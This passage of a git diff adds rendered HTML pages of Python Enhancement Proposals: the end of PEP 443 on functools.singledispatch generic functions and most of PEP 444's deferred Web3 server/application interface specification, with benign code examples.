Rationale and Goals

+

Python has always provided a variety of built-in and standard-library +generic functions, such as len(), iter(), pprint.pprint(), +copy.copy(), and most of the functions in the operator module. +However, it currently:

+
    +
  1. does not have a simple or straightforward way for developers to create new generic functions,
  2. does not have a standard way for methods to be added to existing generic functions (i.e., some are added using registration functions, others require defining __special__ methods, possibly by monkeypatching).
+

In addition, it is currently a common anti-pattern for Python code to +inspect the types of received arguments, in order to decide what to do +with the objects.

+

For example, code may wish to accept either an object +of some type, or a sequence of objects of that type. +Currently, the “obvious way” to do this is by type inspection, but this +is brittle and closed to extension.

+

Abstract Base Classes make it easier +to discover present behaviour, but don’t help adding new behaviour. +A developer using an already-written library may be unable to change how +their objects are treated by such code, especially if the objects they +are using were created by a third party.

+

Therefore, this PEP proposes a uniform API to address dynamic +overloading using decorators.

+
+
+

User API

+

To define a generic function, decorate it with the @singledispatch +decorator. Note that the dispatch happens on the type of the first +argument. Create your function accordingly:

+
>>> from functools import singledispatch
+>>> @singledispatch
+... def fun(arg, verbose=False):
+...     if verbose:
+...         print("Let me just say,", end=" ")
+...     print(arg)
+
+
+

To add overloaded implementations to the function, use the +register() attribute of the generic function. This is a decorator, +taking a type parameter and decorating a function implementing the +operation for that type:

+
>>> @fun.register(int)
+... def _(arg, verbose=False):
+...     if verbose:
+...         print("Strength in numbers, eh?", end=" ")
+...     print(arg)
+...
+>>> @fun.register(list)
+... def _(arg, verbose=False):
+...     if verbose:
+...         print("Enumerate this:")
+...     for i, elem in enumerate(arg):
+...         print(i, elem)
+
+
+

To enable registering lambdas and pre-existing functions, the +register() attribute can be used in a functional form:

+
>>> def nothing(arg, verbose=False):
+...     print("Nothing.")
+...
+>>> fun.register(type(None), nothing)
+
+
+

The register() attribute returns the undecorated function. This +enables decorator stacking, pickling, as well as creating unit tests for +each variant independently:

+
>>> @fun.register(float)
+... @fun.register(Decimal)
+... def fun_num(arg, verbose=False):
+...     if verbose:
+...         print("Half of your number:", end=" ")
+...     print(arg / 2)
+...
+>>> fun_num is fun
+False
+
+
+

When called, the generic function dispatches on the type of the first +argument:

+
>>> fun("Hello, world.")
+Hello, world.
+>>> fun("test.", verbose=True)
+Let me just say, test.
+>>> fun(42, verbose=True)
+Strength in numbers, eh? 42
+>>> fun(['spam', 'spam', 'eggs', 'spam'], verbose=True)
+Enumerate this:
+0 spam
+1 spam
+2 eggs
+3 spam
+>>> fun(None)
+Nothing.
+>>> fun(1.23)
+0.615
+
+
+

Where there is no registered implementation for a specific type, its +method resolution order is used to find a more generic implementation. +The original function decorated with @singledispatch is registered +for the base object type, which means it is used if no better +implementation is found.

+

To check which implementation the generic function will choose for a given type, use the dispatch() attribute:

+
>>> fun.dispatch(float)
+<function fun_num at 0x104319058>
+>>> fun.dispatch(dict)    # note: default implementation
+<function fun at 0x103fe0000>
+
+
+

To access all registered implementations, use the read-only registry +attribute:

+
>>> fun.registry.keys()
+dict_keys([<class 'NoneType'>, <class 'int'>, <class 'object'>,
+          <class 'decimal.Decimal'>, <class 'list'>,
+          <class 'float'>])
+>>> fun.registry[float]
+<function fun_num at 0x1035a2840>
+>>> fun.registry[object]
+<function fun at 0x103fe0000>
+
+
+

The proposed API is intentionally limited and opinionated, so as to ensure it is easy to explain and use, as well as to maintain consistency with existing members of the functools module.

+
+
+

Implementation Notes

+

The functionality described in this PEP is already implemented in the +pkgutil standard library module as simplegeneric. Because this +implementation is mature, the goal is to move it largely as-is. The +reference implementation is available on hg.python.org [1].

+

The dispatch type is specified as a decorator argument. An alternative +form using function annotations was considered but its inclusion +has been rejected. As of May 2013, this usage pattern is out of scope +for the standard library [2], and the best practices for +annotation usage are still debated.

+

Based on the current pkgutil.simplegeneric implementation, and +following the convention on registering virtual subclasses on Abstract +Base Classes, the dispatch registry will not be thread-safe.

+
+

Abstract Base Classes

+

The pkgutil.simplegeneric implementation relied on several forms of +method resolution order (MRO). @singledispatch removes special +handling of old-style classes and Zope’s ExtensionClasses. More +importantly, it introduces support for Abstract Base Classes (ABC).

+

When a generic function implementation is registered for an ABC, the +dispatch algorithm switches to an extended form of C3 linearization, +which includes the relevant ABCs in the MRO of the provided argument. +The algorithm inserts ABCs where their functionality is introduced, i.e. +issubclass(cls, abc) returns True for the class itself but +returns False for all its direct base classes. Implicit ABCs for +a given class (either registered or inferred from the presence of +a special method like __len__()) are inserted directly after the +last ABC explicitly listed in the MRO of said class.

+

In its most basic form, this linearization returns the MRO for the given +type:

+
>>> _compose_mro(dict, [])
+[<class 'dict'>, <class 'object'>]
+
+
+

When the second argument contains ABCs that the specified type is +a subclass of, they are inserted in a predictable order:

+
>>> _compose_mro(dict, [Sized, MutableMapping, str,
+...                     Sequence, Iterable])
+[<class 'dict'>, <class 'collections.abc.MutableMapping'>,
+ <class 'collections.abc.Mapping'>, <class 'collections.abc.Sized'>,
+ <class 'collections.abc.Iterable'>, <class 'collections.abc.Container'>,
+ <class 'object'>]
+
+
+

While this mode of operation is significantly slower, all dispatch +decisions are cached. The cache is invalidated on registering new +implementations on the generic function or when user code calls +register() on an ABC to implicitly subclass it. In the latter case, +it is possible to create a situation with ambiguous dispatch, for +instance:

+
>>> from collections.abc import Iterable, Container
+>>> class P:
+...     pass
+>>> Iterable.register(P)
+<class '__main__.P'>
+>>> Container.register(P)
+<class '__main__.P'>
+
+
+

Faced with ambiguity, @singledispatch refuses the temptation to +guess:

+
>>> @singledispatch
+... def g(arg):
+...     return "base"
+...
+>>> g.register(Iterable, lambda arg: "iterable")
+<function <lambda> at 0x108b49110>
+>>> g.register(Container, lambda arg: "container")
+<function <lambda> at 0x108b491c8>
+>>> g(P())
+Traceback (most recent call last):
+...
+RuntimeError: Ambiguous dispatch: <class 'collections.abc.Container'>
+or <class 'collections.abc.Iterable'>
+
+
+

Note that this exception would not be raised if one or more ABCs had +been provided explicitly as base classes during class definition. In +this case dispatch happens in the MRO order:

+
>>> class Ten(Iterable, Container):
+...     def __iter__(self):
+...         for i in range(10):
+...             yield i
+...     def __contains__(self, value):
+...         return value in range(10)
+...
+>>> g(Ten())
+'iterable'
+
+
+

A similar conflict arises when subclassing an ABC is inferred from the +presence of a special method like __len__() or __contains__():

+
>>> class Q:
+...   def __contains__(self, value):
+...     return False
+...
+>>> issubclass(Q, Container)
+True
+>>> Iterable.register(Q)
+<class '__main__.Q'>
+>>> g(Q())
+Traceback (most recent call last):
+...
+RuntimeError: Ambiguous dispatch: <class 'collections.abc.Container'>
+or <class 'collections.abc.Iterable'>
+
+
+

An early version of the PEP contained a custom approach that was simpler +but created a number of edge cases with surprising results [3].

+
+
+
+

Usage Patterns

+

This PEP proposes extending behaviour only of functions specifically +marked as generic. Just as a base class method may be overridden by +a subclass, so too a function may be overloaded to provide custom +functionality for a given type.

+

Universal overloading does not equal arbitrary overloading, in the +sense that we need not expect people to randomly redefine the behavior +of existing functions in unpredictable ways. To the contrary, generic +function usage in actual programs tends to follow very predictable +patterns and registered implementations are highly-discoverable in the +common case.

+

If a module is defining a new generic operation, it will usually also +define any required implementations for existing types in the same +place. Likewise, if a module is defining a new type, then it will +usually define implementations there for any generic functions that it +knows or cares about. As a result, the vast majority of registered +implementations can be found adjacent to either the function being +overloaded, or to a newly-defined type for which the implementation is +adding support.

+

It is only in rather infrequent cases that one will have implementations +registered in a module that contains neither the function nor the +type(s) for which the implementation is added. In the absence of +incompetence or deliberate intention to be obscure, the few +implementations that are not registered adjacent to the relevant type(s) +or function(s), will generally not need to be understood or known about +outside the scope where those implementations are defined. (Except in +the “support modules” case, where best practice suggests naming them +accordingly.)

+

As mentioned earlier, single-dispatch generics are already prolific +throughout the standard library. A clean, standard way of doing them +provides a way forward to refactor those custom implementations to use +a common one, opening them up for user extensibility at the same time.

+
+
+

Alternative approaches

+

In PEP 3124 Phillip J. Eby proposes a full-grown solution +with overloading based on arbitrary rule sets (with the default +implementation dispatching on argument types), as well as interfaces, +adaptation and method combining. PEAK-Rules [4] is +a reference implementation of the concepts described in PJE’s PEP.

+

Such a broad approach is inherently complex, which makes reaching +a consensus hard. In contrast, this PEP focuses on a single piece of +functionality that is simple to reason about. It’s important to note +this does not preclude the use of other approaches now or in the future.

+

In a 2005 article on Artima [5] Guido van Rossum presents +a generic function implementation that dispatches on types of all +arguments on a function. The same approach was chosen in Andrey Popp’s +generic package available on PyPI [6], as well as David +Mertz’s gnosis.magic.multimethods [7].

+

While this seems desirable at first, I agree with Fredrik Lundh’s +comment that “if you design APIs with pages of logic just to sort out +what code a function should execute, you should probably hand over the +API design to someone else”. In other words, the single argument +approach proposed in this PEP is not only easier to implement but also +clearly communicates that dispatching on a more complex state is an +anti-pattern. It also has the virtue of corresponding directly with the +familiar method dispatch mechanism in object oriented programming. The +only difference is whether the custom implementation is associated more +closely with the data (object-oriented methods) or the algorithm +(single-dispatch overloading).

+

PyPy’s RPython offers extendabletype [8], a metaclass which +enables classes to be externally extended. In combination with +pairtype() and pair() factories, this offers a form of +single-dispatch generics.

+
+
+

Acknowledgements

+

Apart from Phillip J. Eby’s work on PEP 3124 and +PEAK-Rules, influences include Paul Moore’s original issue +[9] that proposed exposing pkgutil.simplegeneric as part +of the functools API, Guido van Rossum’s article on multimethods +[5], and discussions with Raymond Hettinger on a general +pprint rewrite. Huge thanks to Alyssa Coghlan for encouraging me to create +this PEP and providing initial feedback.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0443.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0444/index.html b/pep-0444/index.html new file mode 100644 index 00000000000..34a86184f28 --- /dev/null +++ b/pep-0444/index.html @@ -0,0 +1,1621 @@ + + + + + + + + PEP 444 – Python Web3 Interface | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 444 – Python Web3 Interface

+
+
Author:
+
Chris McDonough <chrism at plope.com>, +Armin Ronacher <armin.ronacher at active-4.com>
+
Discussions-To:
+
Web-SIG list
+
Status:
+
Deferred
+
Type:
+
Informational
+
Created:
+
19-Jul-2010
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document specifies a proposed second-generation standard +interface between web servers and Python web applications or +frameworks.

+
+
+

PEP Deferral

+

Further exploration of the concepts covered in this PEP has been deferred +for lack of a current champion interested in promoting the goals of the PEP +and collecting and incorporating feedback, and with sufficient available +time to do so effectively.

+

Note that since this PEP was first created, PEP 3333 was created as a more +incremental update that permitted use of WSGI on Python 3.2+. However, an +alternative specification that furthers the Python 3 goals of a cleaner +separation of binary and text data may still be valuable.

+
+
+

Rationale and Goals

+

This protocol and specification are influenced heavily by the Web Server Gateway Interface (WSGI) 1.0 standard described in PEP 333. The high-level rationale for having any standard that allows Python-based web servers and applications to interoperate is outlined in PEP 333. This document essentially uses PEP 333 as a template, and changes its wording in various places for the purpose of forming a different standard.

+

Python currently boasts a wide variety of web application frameworks +which use the WSGI 1.0 protocol. However, due to changes in the +language, the WSGI 1.0 protocol is not compatible with Python 3. This +specification describes a standardized WSGI-like protocol that lets +Python 2.6, 2.7 and 3.1+ applications communicate with web servers. +Web3 is clearly a WSGI derivative; it only uses a different name than +“WSGI” in order to indicate that it is not in any way backwards +compatible.

+

Applications and servers which are written to this specification are +meant to work properly under Python 2.6.X, Python 2.7.X and Python +3.1+. Neither an application nor a server that implements the Web3 +specification can be easily written which will work under Python 2 +versions earlier than 2.6 nor Python 3 versions earlier than 3.1.

+
+

Note

+

The true minimum Python 3 version is whichever release fixed http://bugs.python.org/issue4006 so that os.environ['foo'] returns surrogates (à la PEP 383) when the value of ‘foo’ cannot be decoded using the current locale, instead of failing with a KeyError. In particular, Python 3.0 is not supported.

+
+
+

Note

+

Python 2.6 is the first Python version that supported an alias for +bytes and the b"foo" literal syntax. This is why it is the +minimum version supported by Web3.

+
+

Explicability and documentability are the main technical drivers for +the decisions made within the standard.

+
+
+

Differences from WSGI

+
    +
  • All protocol-specific environment names are prefixed with web3. rather than wsgi., e.g. web3.input rather than wsgi.input.
  • All values present as environment dictionary values are explicitly bytes instances instead of native strings. (Environment keys however are native strings, always str regardless of platform.)
  • All values returned by an application must be bytes instances, including status code, header names and values, and the body.
  • Wherever WSGI 1.0 referred to an app_iter, this specification refers to a body.
  • No start_response() callback (and therefore no write() callable nor exc_info data).
  • The readline() function of web3.input must support a size hint parameter.
  • The read() function of web3.input must be length delimited. A call without a size argument must not read more than the content length header specifies. In case a content length header is absent the stream must not return anything on read. It must never request more data than specified from the client.
  • No requirement for middleware to yield an empty string if it needs more information from an application to produce output (e.g. no “Middleware Handling of Block Boundaries”).
  • File-like objects passed to a “file_wrapper” must have an __iter__ which returns bytes (never text).
  • wsgi.file_wrapper is not supported.
  • QUERY_STRING, SCRIPT_NAME, PATH_INFO values are required to be placed in environ by the server (each as the empty bytes instance if no associated value is received in the HTTP request).
  • web3.path_info and web3.script_name should be put into the Web3 environment, if possible, by the origin Web3 server. When available, each is the original, plain 7-bit ASCII, URL-encoded variant of its CGI equivalent derived directly from the request URI (with %2F segment markers and other meta-characters intact). If the server cannot provide one (or both) of these values, it must omit the value(s) it cannot provide from the environment.
  • This requirement was removed: “middleware components must not block iteration waiting for multiple values from an application iterable. If the middleware needs to accumulate more data from the application before it can produce any output, it must yield an empty string.”
  • SERVER_PORT must be a bytes instance (not an integer).
  • The server must not inject an additional Content-Length header by guessing the length from the response iterable. This must be set by the application itself in all situations.
  • If the origin server advertises that it has the web3.async capability, a Web3 application callable used by the server is permitted to return a callable that accepts no arguments. When it does so, this callable is to be called periodically by the origin server until it returns a non-None response, which must be a normal Web3 response tuple.
+
+
+

Specification Overview

+

The Web3 interface has two sides: the “server” or “gateway” side, and +the “application” or “framework” side. The server side invokes a +callable object that is provided by the application side. The +specifics of how that object is provided are up to the server or +gateway. It is assumed that some servers or gateways will require an +application’s deployer to write a short script to create an instance +of the server or gateway, and supply it with the application object. +Other servers and gateways may use configuration files or other +mechanisms to specify where an application object should be imported +from, or otherwise obtained.

+

In addition to “pure” servers/gateways and applications/frameworks, it +is also possible to create “middleware” components that implement both +sides of this specification. Such components act as an application to +their containing server, and as a server to a contained application, +and can be used to provide extended APIs, content transformation, +navigation, and other useful functions.

+

Throughout this specification, we will use the term “application +callable” to mean “a function, a method, or an instance with a +__call__ method”. It is up to the server, gateway, or application +implementing the application callable to choose the appropriate +implementation technique for their needs. Conversely, a server, +gateway, or application that is invoking a callable must not have +any dependency on what kind of callable was provided to it. +Application callables are only to be called, not introspected upon.

+
+

The Application/Framework Side

+

The application object is simply a callable object that accepts one +argument. The term “object” should not be misconstrued as requiring +an actual object instance: a function, method, or instance with a +__call__ method are all acceptable for use as an application +object. Application objects must be able to be invoked more than +once, as virtually all servers/gateways (other than CGI) will make +such repeated requests. If this cannot be guaranteed by the +implementation of the actual application, it has to be wrapped in a +function that creates a new instance on each call.

+
+

Note

+

Although we refer to it as an “application” object, this should not be construed to mean that application developers will use Web3 as a web programming API. It is assumed that application developers will continue to use existing, high-level framework services to develop their applications. Web3 is a tool for framework and server developers, and is not intended to directly support application developers.

+
+

An example of an application which is a function (simple_app):

+
def simple_app(environ):
+    """Simplest possible application object"""
+    status = b'200 OK'
+    headers = [(b'Content-type', b'text/plain')]
+    body = [b'Hello world!\n']
+    return body, status, headers
+
+
+

An example of an application which is an instance (simple_app):

+
class AppClass(object):
+
+    """Produce the same output, but using an instance.  An
+    instance of this class must be instantiated before it is
+    passed to the server.  """
+
+  def __call__(self, environ):
+        status = b'200 OK'
+        headers = [(b'Content-type', b'text/plain')]
+        body = [b'Hello world!\n']
+        return body, status, headers
+
+simple_app = AppClass()
+
+
+

Alternately, an application callable may return a callable instead of +the tuple if the server supports asynchronous execution. See +information concerning web3.async for more information.

+
+
+

The Server/Gateway Side

+

The server or gateway invokes the application callable once for each +request it receives from an HTTP client, that is directed at the +application. To illustrate, here is a simple CGI gateway, implemented +as a function taking an application object. Note that this simple +example has limited error handling, because by default an uncaught +exception will be dumped to sys.stderr and logged by the web +server.

+
import locale
+import os
+import sys
+
+encoding = locale.getpreferredencoding()
+
+stdout = sys.stdout
+
+if hasattr(sys.stdout, 'buffer'):
+    # Python 3 compatibility; we need to be able to push bytes out
+    stdout = sys.stdout.buffer
+
+def get_environ():
+    d = {}
+    for k, v in os.environ.items():
+        # Python 3 compatibility
+        if not isinstance(v, bytes):
+            # We must explicitly encode the string to bytes under
+            # Python 3.1+
+            v = v.encode(encoding, 'surrogateescape')
+        d[k] = v
+    return d
+
+def run_with_cgi(application):
+
+    environ = get_environ()
+    environ['web3.input']        = sys.stdin
+    environ['web3.errors']       = sys.stderr
+    environ['web3.version']      = (1, 0)
+    environ['web3.multithread']  = False
+    environ['web3.multiprocess'] = True
+    environ['web3.run_once']     = True
+    environ['web3.async']        = False
+
+    if environ.get('HTTPS', b'off') in (b'on', b'1'):
+        environ['web3.url_scheme'] = b'https'
+    else:
+        environ['web3.url_scheme'] = b'http'
+
+    rv = application(environ)
+    if hasattr(rv, '__call__'):
+        raise TypeError('This webserver does not support asynchronous '
+                        'responses.')
+    body, status, headers = rv
+
+    CRLF = b'\r\n'
+
+    try:
+        stdout.write(b'Status: ' + status + CRLF)
+        for header_name, header_val in headers:
+            stdout.write(header_name + b': ' + header_val + CRLF)
+        stdout.write(CRLF)
+        for chunk in body:
+            stdout.write(chunk)
+            stdout.flush()
+    finally:
+        if hasattr(body, 'close'):
+            body.close()
+
+
+
+
+

Middleware: Components that Play Both Sides

+

A single object may play the role of a server with respect to some +application(s), while also acting as an application with respect to +some server(s). Such “middleware” components can perform such +functions as:

+
    +
  • Routing a request to different application objects based on the target URL, after rewriting the environ accordingly.
  • Allowing multiple applications or frameworks to run side by side in the same process.
  • Load balancing and remote processing, by forwarding requests and responses over a network.
  • Performing content postprocessing, such as applying XSL stylesheets.
+

The presence of middleware in general is transparent to both the +“server/gateway” and the “application/framework” sides of the +interface, and should require no special support. A user who desires +to incorporate middleware into an application simply provides the +middleware component to the server, as if it were an application, and +configures the middleware component to invoke the application, as if +the middleware component were a server. Of course, the “application” +that the middleware wraps may in fact be another middleware component +wrapping another application, and so on, creating what is referred to +as a “middleware stack”.

+

A middleware must support asynchronous execution if possible or fall +back to disabling itself.

+

Here is a middleware that changes the HTTP_HOST key if an X-Host header exists and adds a comment to all HTML responses:

+
import time
+
+def apply_filter(app, environ, filter_func):
+    """Helper function that passes the return value from an
+    application to a filter function when the results are
+    ready.
+    """
+    app_response = app(environ)
+
+    # synchronous response, filter now
+    if not hasattr(app_response, '__call__'):
+        return filter_func(*app_response)
+
+    # asynchronous response.  filter when results are ready
+    def polling_function():
+        rv = app_response()
+        if rv is not None:
+            return filter_func(*rv)
+    return polling_function
+
+def proxy_and_timing_support(app):
+    def new_application(environ):
+        def filter_func(body, status, headers):
+            now = time.time()
+            for key, value in headers:
+                if key.lower() == b'content-type' and \
+                   value.split(b';')[0] == b'text/html':
+                    # assumes ascii compatible encoding in body,
+                    # but the middleware should actually parse the
+                    # content type header and figure out the
+                    # encoding when doing that.
+                    body += ('<!-- Execution time: %.2fsec -->' %
+                             (now - then)).encode('ascii')
+                    break
+            return body, status, headers
+        then = time.time()
+        host = environ.get('HTTP_X_HOST')
+        if host is not None:
+            environ['HTTP_HOST'] = host
+
+        # use the apply_filter function that applies a given filter
+        # function for both async and sync responses.
+        return apply_filter(app, environ, filter_func)
+    return new_application
+
+app = proxy_and_timing_support(app)
+
+
+
+
+
+

Specification Details

+

The application callable must accept one positional argument. For the +sake of illustration, we have named it environ, but it is not +required to have this name. A server or gateway must invoke the +application object using a positional (not keyword) argument. +(E.g. by calling body, status, headers = application(environ) as +shown above.)

+

The environ parameter is a dictionary object, containing CGI-style +environment variables. This object must be a builtin Python +dictionary (not a subclass, UserDict or other dictionary +emulation), and the application is allowed to modify the dictionary in +any way it desires. The dictionary must also include certain +Web3-required variables (described in a later section), and may also +include server-specific extension variables, named according to a +convention that will be described below.

+

When called by the server, the application object must return a tuple containing three elements: body, status and headers (in that order, as in the examples above), or, if supported by an async server, an argumentless callable which either returns None or a tuple of those three elements.

+

The status element is a status in bytes of the form b'999 +Message here'.

+

headers is a Python list of (header_name, header_value) pairs +describing the HTTP response header. The headers structure must +be a literal Python list; it must yield two-tuples. Both +header_name and header_value must be bytes values.

+

The body is an iterable yielding zero or more bytes instances. +This can be accomplished in a variety of ways, such as by returning a +list containing bytes instances as body, or by returning a +generator function as body that yields bytes instances, or by the +body being an instance of a class which is iterable. Regardless +of how it is accomplished, the application object must always return a +body iterable yielding zero or more bytes instances.
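For instance, a sketch of an application returning a generator as its body (the function names are illustrative):

def streaming_app(environ):
    def generate():
        # A generator is an acceptable body: it yields bytes.
        yield b'Hello '
        yield b'world!\n'
    status = b'200 OK'
    headers = [(b'Content-type', b'text/plain'),
               (b'Content-length', b'13')]
    return generate(), status, headers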

+

The server or gateway must transmit the yielded bytes to the client in +an unbuffered fashion, completing the transmission of each set of +bytes before requesting another one. (In other words, applications +should perform their own buffering. See the Buffering and +Streaming section below for more on how application output must be +handled.)

+

The server or gateway should treat the yielded bytes as binary byte +sequences: in particular, it should ensure that line endings are not +altered. The application is responsible for ensuring that the +string(s) to be written are in a format suitable for the client. (The +server or gateway may apply HTTP transfer encodings, or perform +other transformations for the purpose of implementing HTTP features +such as byte-range transmission. See Other HTTP Features, below, +for more details.)

+

If the body iterable returned by the application has a close() method, the server or gateway must call that method upon completion of the current request, whether the request was completed normally, or terminated early due to an error. This is to support resource release by the application and is intended to complement PEP 325’s generator support, and other common iterables with close() methods.

+

Finally, servers and gateways must not directly use any other +attributes of the body iterable returned by the application.

+
+

environ Variables

+

The environ dictionary is required to contain various CGI +environment variables, as defined by the Common Gateway Interface +specification [2].

+

The following CGI variables must be present. Each key is a native +string. Each value is a bytes instance.

+
+

Note

+

In Python 3.1+, a “native string” is a str decoded using the surrogateescape error handler, as done by os.environ.__getitem__. In Python 2.6 and 2.7, a “native string” is a str representing a set of bytes.

+
+
+
REQUEST_METHOD
The HTTP request method, such as b"GET" or b"POST".
+
SCRIPT_NAME
The initial portion of the request URL’s “path” that corresponds to +the application object, so that the application knows its virtual +“location”. This may be the empty bytes instance if the application +corresponds to the “root” of the server. SCRIPT_NAME will be a +bytes instance representing a sequence of URL-encoded segments +separated by the slash character (/). It is assumed that +%2F characters will be decoded into literal slash characters +within PATH_INFO, as per CGI.
+
PATH_INFO
The remainder of the request URL’s “path”, designating the virtual “location” of the request’s target within the application. This may be the empty bytes instance if the request URL targets the application root and does not have a trailing slash. PATH_INFO will be a bytes instance representing a sequence of URL-encoded segments separated by the slash character (/). It is assumed that %2F characters will be decoded into literal slash characters within PATH_INFO, as per CGI.
+
QUERY_STRING
The portion of the request URL (in bytes) that follows the "?", +if any, or the empty bytes instance.
+
SERVER_NAME, SERVER_PORT
When combined with SCRIPT_NAME and PATH_INFO (or their raw +equivalents), these variables can be used to complete the URL. +Note, however, that HTTP_HOST, if present, should be used in +preference to SERVER_NAME for reconstructing the request URL. +See the URL Reconstruction section below for more detail. +SERVER_PORT should be a bytes instance, not an integer.
+
SERVER_PROTOCOL
The version of the protocol the client used to send the request. Typically this will be something like b"HTTP/1.0" or b"HTTP/1.1" and may be used by the application to determine how to treat any HTTP request headers. (This variable should probably be called REQUEST_PROTOCOL, since it denotes the protocol used in the request, and is not necessarily the protocol that will be used in the server’s response. However, for compatibility with CGI we have to keep the existing name.)
+
+

The following CGI values may be present in the Web3 environment. Each key is a native string. Each value is a bytes instance.

+
+
CONTENT_TYPE
The contents of any Content-Type fields in the HTTP request.
+
CONTENT_LENGTH
The contents of any Content-Length fields in the HTTP request.
+
HTTP_ Variables
Variables corresponding to the client-supplied HTTP request headers +(i.e., variables whose names begin with "HTTP_"). The presence +or absence of these variables should correspond with the presence or +absence of the appropriate HTTP header in the request.
+
+

A server or gateway should attempt to provide as many other CGI +variables as are applicable, each with a string for its key and a +bytes instance for its value. In addition, if SSL is in use, the +server or gateway should also provide as many of the Apache SSL +environment variables [4] as are applicable, such as HTTPS=on and +SSL_PROTOCOL. Note, however, that an application that uses any +CGI variables other than the ones listed above are necessarily +non-portable to web servers that do not support the relevant +extensions. (For example, web servers that do not publish files will +not be able to provide a meaningful DOCUMENT_ROOT or +PATH_TRANSLATED.)

+

A Web3-compliant server or gateway should document what variables +it provides, along with their definitions as appropriate. +Applications should check for the presence of any variables they +require, and have a fallback plan in the event such a variable is +absent.

+

Note that CGI variable values must be bytes instances, if they are +present at all. It is a violation of this specification for a CGI +variable’s value to be of any type other than bytes. On Python 2, +this means they will be of type str. On Python 3, this means they +will be of type bytes.

+

The keys of all CGI and non-CGI variables in the environ, however, must be “native strings” (on both Python 2 and Python 3, they will be of type str).

+

In addition to the CGI-defined variables, the environ dictionary +may also contain arbitrary operating-system “environment +variables”, and must contain the following Web3-defined variables.

+
web3.version
The tuple (1, 0), representing Web3 version 1.0.
+
web3.url_scheme
A bytes value representing the “scheme” portion of the URL at which the application is being invoked. Normally, this will have the value b"http" or b"https", as appropriate.
+
web3.input
An input stream (file-like object) from which bytes constituting the HTTP request body can be read. (The server or gateway may perform reads on-demand as requested by the application, or it may pre-read the client’s request body and buffer it in-memory or on disk, or use any other technique for providing such an input stream, according to its preference.)
+
web3.errors
An output stream (file-like object) to which error output text can be written, for the purpose of recording program or other errors in a standardized and possibly centralized location. This should be a “text mode” stream; i.e., applications should use "\n" as a line ending, and assume that it will be converted to the correct line ending by the server/gateway. Applications may not send bytes to the ‘write’ method of this stream; they may only send text.
For many servers, web3.errors will be the server’s main error log. Alternatively, this may be sys.stderr, or a log file of some sort. The server’s documentation should include an explanation of how to configure this or where to find the recorded output. A server or gateway may supply different error streams to different applications, if this is desired.
+
web3.multithread
This value should evaluate true if the application object may be simultaneously invoked by another thread in the same process, and should evaluate false otherwise.
+
web3.multiprocess
This value should evaluate true if an equivalent application object may be simultaneously invoked by another process, and should evaluate false otherwise.
+
web3.run_once
This value should evaluate true if the server or gateway expects (but does not guarantee!) that the application will only be invoked this one time during the life of its containing process. Normally, this will only be true for a gateway based on CGI (or something similar).
+
web3.script_name
The non-URL-decoded SCRIPT_NAME value. Through a historical inequity, by virtue of the CGI specification, SCRIPT_NAME is present within the environment as an already URL-decoded string. This is the original URL-encoded value derived from the request URI. If the server cannot provide this value, it must omit it from the environ.
+
web3.path_info
The non-URL-decoded PATH_INFO value. Through a historical inequity, by virtue of the CGI specification, PATH_INFO is present within the environment as an already URL-decoded string. This is the original URL-encoded value derived from the request URI. If the server cannot provide this value, it must omit it from the environ.
+
web3.async
This is True if the webserver supports async invocation. In that case an application is allowed to return a callable instead of a tuple with the response. The exact semantics are not specified by this specification.
+

Finally, the environ dictionary may also contain server-defined +variables. These variables should have names which are native +strings, composed of only lower-case letters, numbers, dots, and +underscores, and should be prefixed with a name that is unique to the +defining server or gateway. For example, mod_web3 might define +variables with names like mod_web3.some_variable.

+
+

Input Stream

+

The input stream (web3.input) provided by the server must support +the following methods:

+
Method              Notes
read(size)          1, 4
readline([size])    1, 2, 4
readlines([size])   1, 3, 4
__iter__()          4
+

The semantics of each method are as documented in the Python Library +Reference, except for these notes as listed in the table above:

+
    +
  1. The server is not required to read past the client’s specified Content-Length, and is allowed to simulate an end-of-file condition if the application attempts to read past that point. The application should not attempt to read more data than is specified by the CONTENT_LENGTH variable.
  2. The implementation must support the optional size argument to readline().
  3. The application is free to not supply a size argument to readlines(), and the server or gateway is free to ignore the value of any supplied size argument.
  4. The read, readline and __iter__ methods must return a bytes instance. The readlines method must return a sequence which contains instances of bytes.
+

The methods listed in the table above must be supported by all +servers conforming to this specification. Applications conforming to +this specification must not use any other methods or attributes of +the input object. In particular, applications must not +attempt to close this stream, even if it possesses a close() +method.

+

The input stream should silently ignore attempts to read more than the +content length of the request. If no content length is specified the +stream must be a dummy stream that does not return anything.
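As an illustration, here is a sketch of an application reading the request body under these rules (echo_app is a hypothetical name):

def echo_app(environ):
    # CONTENT_LENGTH, like all CGI values, is a bytes instance.
    raw = environ.get('CONTENT_LENGTH') or b'0'
    length = int(raw.decode('ascii'))
    data = environ['web3.input'].read(length)
    status = b'200 OK'
    headers = [(b'Content-type', b'application/octet-stream'),
               # The application must supply Content-Length itself.
               (b'Content-length', str(len(data)).encode('ascii'))]
    return [data], status, headers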

+
+
+

Error Stream

+

The error stream (web3.errors) provided by the server must support +the following methods:

+
Method             Stream    Notes
flush()            errors    1
write(str)         errors    2
writelines(seq)    errors    2
+

The semantics of each method are as documented in the Python Library +Reference, except for these notes as listed in the table above:

+
    +
  1. Since the errors stream may not be rewound, servers and gateways are free to forward write operations immediately, without buffering. In this case, the flush() method may be a no-op. Portable applications, however, cannot assume that output is unbuffered or that flush() is a no-op. They must call flush() if they need to ensure that output has in fact been written. (For example, to minimize intermingling of data from multiple processes writing to the same error log.)
  2. The write() method must accept a string argument, but needn’t necessarily accept a bytes argument. The writelines() method must accept a sequence argument that consists entirely of strings, but needn’t necessarily accept any bytes instance as a member of the sequence.
+

The methods listed in the table above must be supported by all +servers conforming to this specification. Applications conforming to +this specification must not use any other methods or attributes of +the errors object. In particular, applications must not +attempt to close this stream, even if it possesses a close() +method.
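As a sketch (again, not from the specification), an application might
log to the error stream like this, remembering that write() takes
native strings rather than bytes and that only flush() guarantees the
data has actually been written:

    def app(environ):
        errors = environ['web3.errors']
        errors.write('retrying upstream fetch\n')  # native string, not bytes
        errors.flush()  # ensure the message reaches the log now
        return b'200 OK', [(b'Content-Type', b'text/plain')], [b'ok\n']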
Values Returned by A Web3 Application

+

